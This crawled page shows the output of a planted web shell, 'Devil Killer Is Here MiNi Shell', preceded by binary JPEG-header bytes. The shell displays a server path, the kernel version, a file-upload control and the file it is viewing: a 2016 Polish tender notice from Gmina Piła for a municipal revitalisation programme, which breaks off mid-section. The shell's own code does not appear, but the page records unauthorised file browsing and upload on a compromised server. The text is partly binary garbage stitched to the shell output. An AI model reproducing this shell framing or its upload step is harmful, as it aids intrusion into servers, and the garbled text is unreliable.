JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160617/91587-N-2016.html

<p class="kh_header"><b>Piła: Opracowanie gminnego programu rewitalizacji dla miasta Piły</b><br>
<b>Numer ogłoszenia: 91587 - 2016; data zamieszczenia: 17.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie gminnego programu rewitalizacji dla miasta Piły.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:Opracowanie gminnego programu rewitalizacji dla miasta Piły  zwanego dalej GRP. Złożono wniosek o dofinansowanie ze środków Funduszu Spójności w ramach Programu Operacyjnego Pomoc Techniczna 2014-2020 - Konkurs dotacji na opracowanie lub aktualizację programów rewitalizacji dla gmin województwa wielkopolskiego nr 1/REW/2016.
Samorząd miasta Piły prowadzi aktywnie działania rewitalizacyjne od ponad 15 lat. Aktualnie miasto Piła posiada trzy obowiązujące programy rewitalizacji, opracowane i uchwalone przed wejściem w życie ustawy o rewitalizacji z dnia 9 października 2015 r. (Dz.U. 2015 r. poz. 1777), zgodnie z ówcześnie  obowiązującymi zasadami:
- Lokalny program rewitalizacji obszarów powojskowych na terenie miasta Piły - Aktualizacja, Uchwała Nr XXXIX/462/09 Rady Miasta Piły z dnia 29 września 2009 roku, ze zm. http://www.pila.pl/obszary-powojskowe.html; 
- Lokalny program rewitalizacji obszarów poprzemysłowych na terenie miasta Piły do 2020 roku, Uchwała Nr XX/267/129 Rady Miasta Piły z dnia 24 kwietnia  2012 roku, http://www.pila.pl/obszary-poprzemyslowe.html;
- Program rewitalizacji obszarów miejskich miasta Piły, Uchwała Nr XXXVI/460/13 z dnia 27 sierpnia 2013 roku, http://www.pila.pl/obszary-miejskie.html.
Dokument GPR (gminny program rewitalizacji) będzie stanowił wieloletni program kompleksowych działań w sferze społecznej, gospodarczej, przestrzenno-funkcjonalnej, technicznej i środowiskowej, mających na celu wyprowadzenie wyznaczonych obszarów rewitalizacji ze stanu kryzysowego oraz stworzenie warunków do ich zrównoważonego rozwoju.
Program ma być podstawą do aplikowania o zewnętrzne środki finansowe na współfinansowanie procesów rewitalizacji, w tym środków dostępnych w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014-2020. 
	Przedmiot zamówienia musi być wykonany zgodnie z obowiązującymi przepisami, w szczególności z przepisami Ustawy o rewitalizacji z dnia 9 października 2015 r. o (Dz. U. z 2015 r. poz. 1777), wytycznymi w zakresie rewitalizacji w programach operacyjnych na lata 2014-2020 opracowanymi przez Ministerstwo Infrastruktury i Rozwoju, wytycznymi Urzędu Marszałkowskiego Województwa Wielkopolskiego jako Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Wielkopolskiego 2014-2020  oraz m.in. z założeniami Krajowej Polityki Miejskiej w zakresie rewitalizacji, Narodowego Planu Rewitalizacji.
Wykonanie przedmiotu zamówienia składa się z trzech etapów: 
Etap I - Opracowanie diagnozy; delimitacja obszarów zdegradowanych i rewitalizacji;
Etap II - Opracowanie diagnozy i gminnego programu rewitalizacji dla miasta Piły;
Etap III - Opracowanie zasad działania i wyznaczania składu Komitetu Rewitalizacyjnego

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
Zakres przedmiotu zamówienia dla poszczególnych etapów obejmuje: 
 Etap I - Opracowanie diagnozy; delimitacja obszarów zdegradowanych i rewitalizacji
W ramach etapu I Wykonawca zobowiązany jest do:
1. Opracowania pełnej diagnozy służącej wyznaczeniu obszaru zdegradowanego i obszaru rewitalizacji na terenie miasta Piły, potwierdzającej spełnienie przez te obszary przesłanek ich wyznaczenia zgodnie z ustawą o rewitalizacji i Wytycznymi. 
Zamawiający wymaga sporządzenia przez Wykonawcę szczegółowej diagnozy (scharakteryzowania aktualnej sytuacji społeczno- ekonomiczno- przestrzenno- środowiskowej miasta Piły), której celem będzie identyfikacja występujących negatywnych zjawisk oraz obszaru ich szczególnej koncentracji.
Wymagane jest pozyskanie danych ilościowych i jakościowych, niezbędnych do sporządzenia diagnozy mającej na celu wyznaczenie obszaru/obszarów zdegradowanych oraz obszaru/obszarów rewitalizacji, 
w tym przeprowadzenie badań ankietowych bezpośrednich (na próbie nie mniejszej niż 500 respondentów), wywiadów pogłębionych (nie mniej niż 20 szt.).
Wykonawca opracuje raport, w którym przedstawi wyniki i wnioski z przeprowadzonego procesu gromadzenia danych na potrzeby sporządzenia diagnozy wraz z propozycją wyboru obszaru zdegradowanego oraz obszaru rewitalizacji, przy czym obszary te powinny być wyodrębnione graficznie, opisane słownie i scharakteryzowane (wraz z mapą w skali co najmniej 1:5000, sporządzoną z wykorzystaniem treści mapy zasadniczej, a w przypadku jej braku - z wykorzystaniem treści mapy ewidencyjnej, na której powinny być wyznaczone obszar zdegradowany i obszar rewitalizacji.
2. Opracowania projektu uchwały Rady Miasta Piły w sprawie wyznaczenia obszaru zdegradowanego i obszaru rewitalizacji.
3. Przygotowania i przeprowadzenia konsultacji społecznych projektu uchwały Rady Miasta Piły w sprawie wyznaczenia obszaru zdegradowanego i obszaru rewitalizacji, co najmniej w trzech formach:
1) zbieranie uwag w postaci papierowej/elektronicznej,
2) ankieta konsultacyjna,
3) spotkanie konsultacyjne - moderacja spotkania, zapewnienie sali, przerwy kawowej dla 50 osób, rejestracji wideo oraz przygotowania reportażu 3 minutowego z przebiegu spotkania (lektor, napisy), do udostępnienia w mediach, w tym w Internecie.
Wykonawca przygotuje i zrealizuje działania informacyjno- upowszechniające mające na celu aktywne włączenie interesariuszy w prowadzone prace. Działania obejmą co najmniej:
1) radio: przygotowanie/produkcja 30 sek. spotu radiowego, 30 emisji,
2) opracowanie i druk ulotek, A5, 500 szt.,
3) opracowanie i druk plakatów, A2, 30 szt.
4. Przygotowania i przeprowadzenia szkolenia z zakresu rewitalizacji dla pracowników jst i jednostek miejskich - grupa 20 uczestników. Wykonawca zapewni uczestnikom szkolenia przerwę kawową oraz materiały szkoleniowe (notes A4, długopis, informacje ze szkolenia). Zamawiający udostępni Wykonawcy nieodpłatnie salę niezbędną do organizacji szkolenia.
5. Przygotowania i wykonania nośników informacyjnych do wykorzystania podczas realizacji zadania:
1) tablica informacyjna: 2 szt. do zawieszenia, oprawa profil aluminiowy, format A2, płyta oklejona folią samoprzylepną z grafiką, pełen kolor, front zabezpieczony plexi antyrefleksyjnym, łatwość montażu;
2)  roll-up (exclusive) z wydrukiem: 2 szt., wymiar 85x200 cm.
 Etap II - Opracowanie diagnozy i gminnego programu rewitalizacji dla miasta Piły
W ramach etapu II Wykonawca zobowiązany jest do:
1. Przygotowania projektu uchwały o przystąpieniu do opracowania GPR.
2. Opracowania szczegółowej diagnozy obszaru rewitalizacji służącej sporządzeniu GPR oraz wytyczenia na podstawie przeprowadzonej diagnozy granic obszaru rewitalizacji, przy czym obszar ten powinien być wyodrębniony graficznie, opisany słownie i scharakteryzowany (wraz z mapą w skali co najmniej 1:5000, sporządzoną z wykorzystaniem treści mapy zasadniczej, a w przypadku jej braku - z wykorzystaniem treści mapy ewidencyjnej, na której powinny być wyznaczone obszary rewitalizacji). Wymagane jest pozyskanie danych ilościowych i jakościowych niezbędnych do sporządzenia diagnozy, w tym przeprowadzenie badań ankietowych bezpośrednich (na próbie nie mniejszej niż 500 respondentów), wywiadów pogłębionych (nie mniej niż 20 szt.).
3. Przygotowania i przeprowadzenia działań włączających interesariuszy w proces tworzenia GPR. Działania obejmą co najmniej:
1)  radio: przygotowanie/produkcja 8 różnych spotów 30 sek., 240 emisji;
2) 2 spotkania konsultacyjne - moderacja spotkań, zapewnienie sali oraz przerwy kawowej dla 50 osób na każde spotkanie;
3) 6 spacerów studyjnych;
4) rejestrację wideo spotkań oraz spacerów studyjnych oraz przygotowanie z ich przebiegu 3 minutowych 8 szt. reportaży - (lektor, napisy), do udostępnienia w mediach w tym w internecie;
5) opracowania koncepcji przestrzennego zagospodarowania dla wybranych 6 modelowych przestrzeni publicznych w formie wizualizacji w wersji cyfrowej oraz 6 szt. plansz.
4. Opracowania projektu GPR zgodnie z Ustawą o rewitalizacji oraz Wytycznymi.
Wykonawca zobowiązany jest do :
1) przeprowadzenia procedur wynikających z przepisów ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2016 r. poz. 353), w tym  opracowania wniosku do Państwowego Wojewódzkiego Inspektora Sanitarnego o wydanie opinii i Regionalnego Dyrektora Ochrony Środowiska w sprawie konieczności lub braku konieczności sporządzenia Prognozy Oddziaływania na Środowisko; w przypadku stwierdzenia konieczności przeprowadzenia strategicznej oceny oddziaływania na środowisko Wykonawca sporządzi Prognozę oddziaływania na środowisko projektu GPR; Wykonawca będzie zobowiązany do uaktualnienia Prognozy oddziaływania na środowisko projektu GPR zgodnie z ewentualnymi uwagami organów;
2)  przeprowadzenia procesu uzgodnień i opiniowania projektu GPR zgodnie z ustawą o rewitalizacji;
3) przygotowania projektu uchwały dotyczącej przyjęcia GPR.
5. Przygotowania i przeprowadzenia konsultacji społecznych projektu GPR, co najmniej w trzech formach:
1)  zbieranie uwag w postaci papierowej/elektronicznej,
2) ankieta konsultacyjna,
3) spotkanie konsultacyjne - moderacja spotkania, zapewnienie sali, przerwy kawowej dla 50 osób, rejestracja wideo oraz przygotowania reportażu 3 minutowego z przebiegu spotkania (lektor, napisy), do udostępnienia w mediach, w tym w Internecie.
Wykonawca przygotuje i zrealizuje działania informacyjno- upowszechniające mające na celu aktywne włączenie interesariuszy w prowadzone prace. Działania obejmą co najmniej:
1) radio: przygotowanie/produkcja 30 sek. spotu radiowego, 30 emisji,
2) opracowanie i druk ulotek, A5, 500 szt.,
3) opracowanie i druk plakatów, A2, 30 szt.
6. Przeprowadzenia szerokich działań upowszechniająco- informujących dotyczących przebiegu prac nad przystąpieniem, sporządzaniem i uruchamianiem wdrażania GPR. Działania obejmą co najmniej:
1) prasę: opracowania i zamieszczenie informacji prasowych (2 różnych, 9 publikacji)
2) telewizję: przygotowanie/produkcja 2 różnych 3 minutowych spotów, 60 emisji,
3) radio: przygotowanie/produkcja 30 sek. spotu radiowego, 30 emisji,
4) przygotowanie i wykonanie plansz ekspozycyjnych: 8 szt., płyta PCV, wymiar wys. 140 cm, szer. 100 cm, grubość ok. 4 mm,
5) opracowanie i druk ulotek/broszur: 1000 szt., A4, 12 stron z okładką.
7. Przygotowania i przeprowadzenia szkolenia z zakresu rewitalizacji dla pracowników jst i jednostek miejskich - grupa 20 uczestników. Wykonawca zapewni uczestnikom szkolenia przerwę kawową oraz materiały szkoleniowe (notes A4, długopis, informacje ze szkolenia). Zamawiający udostępni Wykonawcy nieodpłatnie salę niezbędną do organizacji szkolenia.
Etap III - Opracowanie zasad działania i wyznaczania składu Komitetu Rewitalizacyjnego
W ramach etapu III Wykonawca zobowiązany jest do:
1. Przygotowania projektu uchwały w sprawie zasad działania i wyznaczanie składu Komitetu Rewitalizacyjnego.
2. Przygotowania i przeprowadzenia konsultacji społecznych opracowanego projektu uchwały w sprawie zasad działania i wyznaczanie składu Komitetu Rewitalizacyjnego, co najmniej w trzech formach:
1) zbieranie uwag w postaci papierowej/elektronicznej,
2) ankieta konsultacyjna,
3) spotkanie konsultacyjne - moderacja spotkania, zapewnienie sali, przerwy kawowej dla 50 osób,  rejestracja wideo oraz przygotowania reportażu 3 minutowego z przebiegu spotkania (lektor, napisy), do udostępnienia w mediach, w tym w Internecie.
Wykonawca przygotuje i zrealizuje działania informacyjno- upowszechniające mające na celu aktywne włączenie interesariuszy w prowadzone prace. Działania obejmą co najmniej:
1) radio: przygotowanie/produkcja 30 sek. spotu radiowego, 30 emisji,
2) opracowanie i druk ulotek, A5, 500 szt.,
3) opracowanie i druk plakatów, A2, 30 szt.
WYMAGANIA  OGÓLNE
1. Po zakończeniu każdej z form konsultacji Wykonawca przekaże Zamawiającemu raporty podsumowujące ich przebieg, zawierające dane o miejscu i czasie ich przeprowadzenia oraz omówienie treści poruszanych zagadnień. Wykonawca zgromadzi oraz przeanalizuje, w uzgodnieniu z Zamawiającym, zgłaszane w toku konsultacji uwagi oraz wnioski, uzupełni konsultowane dokumenty lub dokona stosownych poprawek.
2. Materiały przeznaczone dla Zamawiającego Wykonawca dostarczać będzie do siedziby 	Zamawiającego.
3. Wykonawca będzie uczestniczył w posiedzeniach komisji Rady Miasta Piły oraz w sesjach Rady Miasta Piły dotyczących opracowywanych projektów uchwał i projektów dokumentów.
4. Wykonawca będzie uczestniczył w procesie uzgadniania GPR z Urzędem Marszałkowskim Województwa Wielkopolskiego, pełniącym funkcję Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Wielkopolskiego na lata 2014-2020. Wykonawca zobowiązany będzie do dokonania w GPR wszelkich zmian oraz uzupełnień wynikających z ewentualnych uwag zgłoszonych przez Instytucję Zarządzającą.
5. Wykonawca, w przypadku uzyskania dofinansowania przez Zamawiającego, będzie zobowiązany do informowania odbiorców (np.: na pismach, ankietach, formularzach, raportach, wydrukach, prezentacjach, zaproszeniach, materiałach informacyjnych, listach obecności itp.), że projekt został zrealizowany przy współfinansowaniu ze środków Unii Europejskiej w ramach Programu Operacyjnego Pomoc Techniczna 2014-2020 zgodnie z rekomendacjami i rozwiązaniami w zakresie informacji i promocji opisanymi w Księdze identyfikacji wizualnej znaku marki Fundusze Europejskie i znaków programów polityki spójności na lata 2014-2020 oraz w Podręczniku Beneficjenta Funduszy Europejskich w zakresie informacji i promocji na lata 2014-2020.
6.  Wykonawca we własnym zakresie pozyska materiały i informacje niezbędne do wykonania przedmiotu umowy. Zamawiający zobowiązuje się do udzielenia wsparcia Wykonawcy w procesie gromadzenia danych oraz do udostępnienia wszelkich posiadanych przez siebie informacji i dokumentów niezbędnych do wykonania przedmiotu zamówienia. 
7.  Wykonawca zrealizuje przedmiot zamówienia po uprzednich uzgodnieniach i akceptacji przez Zamawiającego ostatecznych wersji poszczególnych elementów zamówienia, w tym metodologii.
8. Wykonawca odpowiada za prace powierzone podwykonawcom, niezbędne do realizacji zamówienia.
9.  Wykonawca przekaże Zamawiającemu diagnozę oraz gminny program rewitalizacja dla miasta Piły w formie elektronicznej w formacie pdf oraz edytowalnej doc lub xls (jeżeli tabele lub załączniki zostały sporządzone w formacje xls należy je dołączyć do wersji elektronicznej z aktywnymi/otwartymi formułami) na nośniku CD/DVD - po 2 sztuki oraz papierowej w ilości po 5 egzemplarzy (wydruk w kolorze).
10. Wykonawca przekaże także w formie zapisu na CD/DVD opracowania, dokumenty, raporty sporządzone w ramach realizacji zamówienia w formacie edytowalnym.
11. Wykonawca przekazanie Zamawiającemu pełną dokumentację zebraną podczas opracowywania 	GPR..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.00.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.07.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że wykonał:
1) co najmniej 3 usługi polegające na opracowaniu programu rewitalizacji dla miasta liczącego powyżej 50 tys. mieszkańców, w tym jedna z usług o wartości co najmniej 100 tys. zł brutto;
2) co najmniej 3 usługi polegające na przeprowadzeniu konsultacji społecznych dokumentów strategicznych lub operacyjnych dla miasta liczącego powyżej 50 tys. mieszkańców, z wykorzystaniem następujących technik:
a) spotkania/warsztaty konsultacyjne (rozumiane jako bezpośrednie spotkania z interesariuszami dokumentów strategicznych),
b) bezpośrednie badania ankietowe (rozumiane jako badania bezpośrednie z respondentami za pomocą ankiety papierowej),
c) spacery studyjne (rozumiane jako spotkania terenowe z interesariuszami dokumentów strategicznych, które łączą w sobie elementy zwiedzania, wykładu o terenie, dyskusji i bieżącego zbierania uwag ustnych),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że dysponuje co najmniej pięcioosobowym zespołem specjalistów zdolnym do wykonania zamówienia składającym się z następujących osób:
- Kierownik Zespołu - osoba co najmniej ze stopniem naukowym doktora, posiadająca jednocześnie doświadczenie w opracowaniu/współopracowaniu co najmniej jednego programu rewitalizacji dla miasta liczącego co najmniej 50 tys. mieszkańców oraz co najmniej 10 publikacji naukowych z zakresu rewitalizacji;
- Specjalista ds. konsultacji społecznych - osoba z wykształceniem wyższym, posiadająca doświadczenie polegające na przeprowadzeniu konsultacji społecznych co najmniej jednego dokumentu strategicznego dla miasta liczącego powyżej 50 tys. mieszkańców z wykorzystaniem następujących technik: spotkania/warsztaty konsultacyjne, bezpośrednie badania ankietowe, spacery studyjne;
- Specjalista ds. rewitalizacji - osoba z wykształceniem wyższym, posiadająca doświadczenie w opracowaniu/współopracowaniu co najmniej jednego programu rewitalizacji dla miasta liczącego co najmniej 50 tys. mieszkańców,
- Specjalista ds. zagospodarowania przestrzennego - osoba z wykształceniem wyższym (kierunek architektura lub urbanistyka) posiadająca doświadczenie w opracowaniu/współopracowaniu co najmniej jednego programu rewitalizacji dla miasta liczącego powyżej 50 tys. mieszkańców;
- Specjalista ds. środowiskowych - osoba  z wykształceniem wyższym, posiadająca doświadczenie w opracowaniu/współopracowani</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie) 
2)  Parafowany wzór  umowy 
3)  Tabela elementów rozliczeniowych - załącznik nr 1a
4)  Opis  metodologii realizacji zamówieniach
5) Propozycja harmonogramu realizacji zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - ocena  metodologii realizacji zamówienia - 60</li>
</ul>
<p><b>IV.2.2)</b>
